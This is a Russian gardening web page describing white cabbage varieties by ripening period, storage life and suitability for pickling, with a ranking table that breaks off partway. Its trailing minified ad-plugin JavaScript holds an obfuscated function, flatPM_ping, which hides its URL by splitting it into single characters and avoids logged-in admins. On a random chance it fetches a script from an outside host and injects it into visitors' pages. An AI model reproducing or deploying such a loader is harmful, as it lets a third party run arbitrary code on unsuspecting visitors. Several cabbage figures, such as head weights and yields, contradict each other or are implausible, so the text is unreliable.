12 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Сорта капусты по сроку созревания

Какой сорт капусты лучше? Узнаем преимущества и недостатки

Капуста — одна из самых часто выращиваемых культур на наших дачах. С давних времён этот овощ стал основой рациона человека, элементом многих полезных и вкусных блюд. Благодаря самоотверженной работе агрономов, удалось определить лучшие сорта капусты, которые отлично приживаются в условиях умеренно континентального климата, и дают богатые урожаи.

Распределение капусты по срокам созревания

Важная характеристика, по которой различаются все сорта белокочанной капусты — скорость созревания с момента посадки в открытый грунт. Классификация сортов капусты по периоду созревания:

  • Ранние — готовы к употреблению на 50 – 120-й дни после переноса рассады в открытый грунт;
  • Средние — дозревают на 120– 160-е сутки после высадки рассады;
  • Поздние — собирать урожай можно примерно на 145–175-й дни после посадки.

Определившись со сроками созревания, выбирайте сорт по другим характеристикам: размеру и весу головок, скорости роста, вкусовым качествам.

Ранние сорта капусты белокачанной

Кочаны рыхлые, листья сочные и сладковатые на вкус. Подходят для приготовления салатов и употребления в сыром виде. Урожай не хранится долго, но быстро созревает. Не используется для засолки и заготовок.

Капуста Парел

Ультраранний сорт «Парел» дозревает на 50-60-е сутки после высадки рассады в почву. Листья средне-мелкие, салатовые, с беловатым налётом. Кочаны плотные, чуть скрыты листьями, сочные на вкус. Масса 1 головки — около 1 кг. С 1 м² можно получить до 5 кг капусты. Сорт выведен голландскими селекционерами как гибрид ультраранней Капусты белокачанной.

Капуста Июньская

Рассаду высаживают в мае, и уже в июне можно собирать урожай. Период созревания — до 100 суток. Сорт не боится холодов, высокодекоративный. Листья салатовые, головки круглые, средней плотности, примерно одинакового размера. Вес кочанов достигает 2 кг при относительно небольших размерах. Урожайность сорта с 1 м² составляет около 5 кг. Переспелые плоды лопаются, поэтому со сбором урожая капусты сорта «Июньская» лучше не медлить. Это один из древних сортов, выведенный в Советском Союзе в 1967 г, и быстро получивший распространение по всей территории постсоветского пространства.

Капуста Золотой гектар

Сорт «Золотой гектар» ценится огородниками за хорошие вкусовые качества и отличную урожайность (7-8 кг с 1 м²). Размеры кочанов достаточно большие, в отдельных случаях их вес составляет 2,5 кг. Головки плотные, долго хранятся, не растрескиваются. Могут поражаться вредителями, поэтому требуются профилактические мероприятия. С момента высадки рассады в грунт растение созревает на 110 день. Сорт получил широкое распространение в Украине и Молдавии.

Средние сорта капусты белокачанной

Среднеспелые сорта используются для непродолжительного хранения, термической обработки и консервирования, а также для употребления в сыром виде. Они делятся на несколько подвидов:
• среднеранние;
• среднеспелые;
• среднепоздние.
Эти сорта соединили в себе характерные достоинства ранних и поздних видов: быстроту созревания, отличные вкусовые качества, высокую урожайность, возможность применения для засолов и консервации, продолжительное время хранения.

Капуста Слава 1305

Высокоурожайный среднеспелый сорт «Слава 1305» ценится за хороший вкус листьев. Считается, что из этой капусты получаются хорошие соленья. Кочан круглой формы, чуть приплюснут, диаметром до 20-25 см. Вес 1 капустной головки находится в пределах от 2 до 4 кг. В разрезе капуста светлая, покрывающие листья — салатовые. Холодо-и засухоустойчива. Урожайность 1 м² достигает от 9 до 12 кг. Обычно созревает за 110-120 дней. Сорт был выведен в Советском Союзе методом отбора иностранного образца, получил широкое распространение в 1940 г.

Капуста Подарок

Сорт среднепоздний, со времени посадки рассады до сбора урожая обычно проходит 4-4,5 мес. Розетка до 1 м в диаметре. Листья зелено-серые, слегка покрыты восково-белым налётом. Кочан округлый, чуть приплюснутый, весом 3-5 кг, в разрезе имеет салатово-белый окрас. Урожайность — 9 кг с 1 м². Отличается привлекательным товарным видом. Изначально сорт «Подарок» был выведен 1920 г для выращивания на продажу, а со временем его оценили и владельцы подсобных хозяйств.

Капуста Доброводская

Сорт среднепоздний, хранится до 5 месяцев. Вес кочанов около 9 кг. Сорт устойчив к болезням, не привередлив к почвам. Вес головок — 3-5 кг. Урожайность 1 м² — до 30 кг. Листья бело-кремовые, сочные, со сладковатым привкусом. Благодаря отличным вкусовым качествам данный сорт идеально подходит для квашения.

Поздние сорта капусты белокачанной

Поздние сорта — высокоурожайные, с отличными вкусовыми характеристиками, подходят для продолжительного хранения и употребления в пищу, а также для заквашивания и консервирования. Такую капусту чаще всего можно встретить на прилавках магазинов в зимний период.

Капуста Агрессор

Головки сорта «Агрессор» весят от 3 до 4,5 кг. Верхние листья фигурные, с небольшим количеством воскового налёта, тёмно-зелёного цвета с синеватым оттенком. В разрезе капуста белая, иногда чуть желтоватая. Период созревания длится около 120 дней. Урожайность — 5-8 кг/ 1 м². Сорт «Агрессор» — гибридный, сравнительно новый. Он выведен в Голландии в 2003 г. Своё название получил за стойкость перед болезнями, вредителями. Данный вид не трескается во время хранения и транспортировки.

Капуста Колобок

От момента посадки до сбора урожая сорта «Колобок» проходит около 160 суток. Листья тёмно-зелёные, гладкие, покрыты восковыми пятнами. Головки сочные и плотные, округлые, весом до 4,5 кг. Урожайность — до 12 кг/м². Сорт универсальный, так как подходит для хранения, переработки, употребления в свежем виде. Получил распространение в 2004 г. Подходит для машинной сборки благодаря однородности кочанов.

Капуста Белоснежка

Капуста данного сорта созревает за 145-165 суток. Головки круглые, чуть приплюснутые, весом от 2 до 3 кг. Урожайность 1 м² — от 5 до 8 кг. Не портятся при перевозке и длительном хранении. Сорт по праву считается одним из самых полезных, рекомендуется для приготовления пищи детям.


По мере приобретения опыта каждый огородник находит лучшие сорта капусты для себя. Поэтому не бойтесь экспериментировать и пробовать выращивать новые сорта, а среди них вы обязательно найдёте правильные варианты.

Сорта белокочанной капусты

Белокочанную капусту выращивать не трудно, но не всегда выбранный сорт отвечает ожиданиям. Ниже описаны лучшие виды капусты в зависимости от метода использования, созревания и хранения. Сорта белокочанной капусты описаны с разных сторон: особенности, основные характеристики, благодаря чему можно определить лучший вид в каждом отдельном случае.

Какие сорта наиболее востребованы?

Востребованными сортами являются разновидности с высокой урожайностью, имеющие отменный вкус и длительный срок хранения.

Наиболее востребованные сорта белокочанной капусты

  • «Мегатон F1» – наиболее плодородный гибрид родом из Голландии. Относится к ранним – созревает за 105 дней от появления всходов. Головки округлые, весят по 15 кг, очень вкусные, универсального применения. Не портится от длительных перевозок, устойчив при выращивании к киле и корневым гнилям.
  • «Июньская» – сорт ранней белокочанной капусты, для полного созревания требуется 2 месяца. Можно выращивать два раза за год (повторно высаживается летом). Головка имеет светло-зеленый окрас, плотная, массой в 2,5 кг. Высаживается довольно густо, боковые листья друг другу не мешают. Может выдерживать весенние, кратковременные заморозки. Недостаток в том, что кочаны растрескиваются или зацветают, если долго не убирать урожай.
  • «Дюма F1» – высокоурожайный ранний гибрид (90 дней), растет даже в загущенных рядах. Головка насыщенного, светло-зеленого окраса, нижние листья песочного цвета. Листочки вкусные, очень нежные, хрустящие. Масса – 1,4-1,5 кг, не трескается даже при перезревании.
  • «Агрессор F1» – поздний вид, обладающий превосходными качествами. Высокоурожайный вне зависимости от места выращивания. Хранится полгода. Кочан весит 4,5 кг в среднем, округлый, очень плотный. Растет без особенного ухода со стороны огородника. Применение универсальное. Устойчив к некоторым заболеваниям.
  • «Ринда F1» – ранний гибрид, лежит не более 4 месяцев, не теряя внешних и вкусовых качеств. Головки не очень плотные, но довольно тугие. Листья нежные, сочные, без горечи насыщенного, светло-зеленого цвета. Растет на любой земле, но от плодородности зависит качество и сроки получения урожая. Может повторно выращиваться летним посевом.

Сорта капусты по сроку созревания

Сорта белокочанной капусты делятся на три подгруппы в зависимости от срока созревания. Каждой группе присущи определенные качества, а не только время сбора урожая.

Сорта белокочанной капусты по сроку созревания

  • Раннюю капусту чаще всего используют для приготовления салатов. В свежем виде она невероятно вкусна, полезна. К отличительным особенностям таких видов можно отнести относительно небольшой кочан, способность расти в тесноте на бедных почвах. Срок созревания длится не более 110 суток после появления ростков. Сюда стоит отнести: «Тобия F1», «Малахит», «Таурус F1», «Гермес F1», «Заря F1».
  • Среднеспелые головки стоит применять для свежего потребления или для квашения. Правда при закваске овощ недолго хранит свои полезные качества и вкус – 3-4 месяца. Сроки вегетации среднеспелых сортов 130 суток в среднем. Наиболее популярными представителями группы являются: «Надежда», «Адема F1», «Тарас F1», «Белорусская 455».
  • Поздние разновидности капусты обладают длительным сроком вегетации. Некоторым для полного дозревания необходимо 180 дней и более, так что собирают их даже поздней осенью, после наступления холодов. Используется для засолки, квашения, хранится на протяжении всей зимы. Из категории особенно выделяются: «Московская поздняя», «Бригадир F1», «Крюмон F1», «Адаптер F1», «Тюкриз».

Какие сорта используются для засолки и квашения?

Чаще всего для засолки и квашения используют белокочанную капусту поздних сортов. Реже применяется среднеспелая, у ранних же видов слишком нежные листья, они буквально разваливаются и быстро утрачивают свой вкус после обработки.

Сорта капусты для засолки и квашения

  • «Слава 1305» – среднеспелый вид, поспевает за 4 месяца. Широко применяется для квашения, засолки, термической обработки. Кочан округлый, сплюснутый, весит до 5 кг. Верхние листочки зеленые, нижние – белые. Транспортабелен, может долго храниться. Недостаток: плохо переносит жару, холод, засуху во время роста и развития.
  • «Атрия F1» – позднеспелая разновидность, употребляется не ранее чем на 145 день после появления ростков. Темно-зеленые листья покрыты восковым налетом. Кочерыжка внутри очень маленькая, вес головки – 3,5 кг. В свежем виде не употребляется еще 1-2 месяца после сбора, но для квашения его рекомендуют даже кулинары. Не разваливается во время хранении и роста, не боится некоторых заболеваний.
  • «Подарок» созревает за 125-135 дней. После квашения приобретает приятный, пряный вкус. Листья становятся нежными, сочными, со слабым сладковатым привкусом. Капуста имеет ярко-зеленые листья покрытые восковым налетом, вес головки – 4 кг, форма приплюснутая. Транспортабельна, хранится длительное время. Устойчива к растрескиванию и некоторым заболеваниям.
  • «Краутман F1» – среднеспелый гибрид. Головка весит 4,5 кг, кочерыжка внутри очень маленькая, верхние листья зеленые, внутренние более светлые, плотные, хрустящие. Во время выращивания не растрескивается. Хранится после сбора до 4 месяцев.

Сюда же можно отнести: «Добровольская», Застольный F1», «Мидор F1», «Купчиха», «Белоснежка».

Какие сорта капусты дольше всего хранятся?

Как правило, хранятся дольше всего именно поздние сорта белокочанной капусты. Их собирают ближе к зиме, складывают в ящики и хранят на протяжении определенного времени. Некоторые виды могут пролежать до середины весны, другие портятся уже в середине января. Ниже приведены наиболее устойчивые к хранению гибриды и сорта.

Сорта белокочанной капусты длительного хранения

  • «Мара» – белорусский вид созревает за 155-167 дней от всходов. Кочаны круглой формы, весом 4 кг, устойчивы к растрескиванию, корневым гнилям, плотные. Могут храниться до апреля в погребе. Применение универсальное.
  • «Амагер 611» – хранится 6 месяцев. Сорт устойчив к весенним и осенним холодам, но засуху не переносит. Созревает за 160 дней. Листья зеленые, восковой налет имеется. Урожайный, созревание происходит дружно. Подходит для длительной транспортировки.
  • «Белоснежка» может лежать до 7 месяцев, не утрачивая вкуса, цвета, не загнивая. Созревает за 160 дней, устойчива к длительной перевозке. Рекомендуется для квашения, приготовления детского питания. Кочаны сине-зеленые, листья плотные, покрыты восковым налетом, вес 4 кг или чуть меньше.
  • «Женева» – отменный позднеспелый сорт. Созревает за 140-150 дней, хранится вплоть до сбора следующего урожая! Транспортабельна, отличается устойчивостью к растрескиванию, хорошо растет даже при минимальном уходе.

Капуста круглый год

До 6 месяцев могут храниться также гибриды: «Донор F1», «Валентина F1», «Крюмон F1» и «Колобок F1».

10 лучших сортов капусты

Капуста белокочанная — холодостойкая листовая овощная культура с двухлетним циклом. О том, как выбрать хорошие семена капусты, и пойдет речь в нашем обзоре.

Из-за низкой жаростойкости и недостаточной засухоустойчивости белокочанная капуста слабо распространена на юге, но прекрасно чувствует себя в Средней полосе. В южных регионах рекомендуют выращивать скороспелые гибриды капусты, мягкие зимы позволяют проводить подзимний посев.

По срокам созревания сорта и гибриды капусты белокочанной разделяют на 4 группы:

  1. Ультраскороспелые — завязывают кочаны, пригодные для срезки, через 55 — 60 дней после высадки рассады или через 90 — 95 дней после всходов; отличаются нежностью листьев; кочаны рыхлые и легковесные, салатного назначения; подходят для тепличного выращивания.
  2. Раннеспелые — техническая спелость наступает через 100 — 120 дней после всходов; кочаны рыхлые, используются для свежего употребления.
  3. Среднеспелые — формируют кочан за 85 — 120 дней после посадки рассады на постоянное место; кочаны подходят для хранения в течение 3 — 4 месяцев после срезки; высокое содержание сахаров делает их пригодными для квашения.
  4. Позднеспелые — для формирования тугого и крупного кочана требуется 140 — 180 дней; основное назначение — зимнее хранение вплоть до нового урожая ранних сортов; отличаются самыми крупными размерами и весом кочана, превосходят по сочности и содержанию витаминов.

Белокочанная капуста выращивается со времен зарождения овощеводства, ее питательная ценность и целебные свойства были известны еще в Древнем Мире. Правильный подбор сортов разного срока созревания позволит обеспечить семью необходимыми витаминами на весь год.

Рейтинг лучших сортов белокочанной капусты

Категория Место Наименование Рейтинг Цена
Лучшие ультраскороспелые сорта и гибриды капусты 1 Экспресс F1 (в реестре с 2003 г.) 9.8 / 10 20
2 Спринтер F1 (в реестре с 2007 г.) 9.7 / 10 25
Лучшие ранние сорта и гибриды капусты 1 Старт F1 (в реестре с 2000 г.) 9.8 / 10 25
2 Трансфер F1 (в реестре c 1993 г.) 9.8 / 10 15
3 Взрыв F1 (в реестре с 2009 г.) 9.7 / 10 22
Лучшие сорта капусты среднего срока созревания — на засолку 1 Слава 1305 (в реестре с 1940 г.) 9.8 / 10 15
2 СБ 3 F1 (в реестре с 1990 г.) 9.8 / 10 30
Лучшие поздние сорта и гибриды капусты — для зимнего хранения 1 Валентина F1 (в реестре с 2004 г.) 9.9 / 10 10
2 Агрессор F1 (в реестре с 2003) 9.8 / 10 32
3 Атрия F1 (в реестре с 1994 г.) 9.8 / 10 30

Лучшие ультраскороспелые сорта и гибриды капусты

Проверенный гибрид капусты, допущенный к выращиванию в большинстве регионов России. Растение низкорослое, образует приподнятую розетку из мелких широко-овальных листьев со светло-зеленой окраской и слабым восковым налетом.

Кочан округлый, среднеплотный, массой 900 — 1300 г, с короткой внутренней кочерыгой. Листья нежные и сладкие. В разрезе кремово-белый.

Растения компактные и позволяют уплотненные посадки. Внешняя кочерыга короткая и хорошо держит кочан без окучивания. Сильнее прочих сортов страдает от вредителей и болезней, поэтому проводят профилактические меры.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};